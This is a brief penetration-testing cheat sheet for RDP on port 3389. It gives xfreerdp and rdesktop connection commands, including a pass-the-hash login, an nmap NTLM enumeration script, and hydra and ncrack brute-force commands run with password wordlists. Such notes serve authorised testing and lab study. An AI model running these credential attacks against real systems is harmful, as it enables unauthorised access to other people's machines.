RDP (3389)

Default Port = 3389


=================Accessing : 
>>> xfreerdp /u:admin /pth:<NTLM-hash-of-user-admin-pass> /v:$IP /cert-ignore  /dynamic-resolution
>>> rdesktop $IP
>>>xfreerdp /u:admin /p:password /cert:ignore /v:10.10.147.80 /workarea

=================Nmap Script : 
>>> nmap -p 3389 --script rdp-ntlm-info $IP

=================Brute-force : 
If You Know The Username : 
>>> ncrack -vv --user administrator -P password-file.txt rdp://$IP
>>> hydra -t 4  -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP

If The Username Is Unknown : 
>>> hydra -V -f -L user.txt -P dict.txt rdp://$IP






Last updated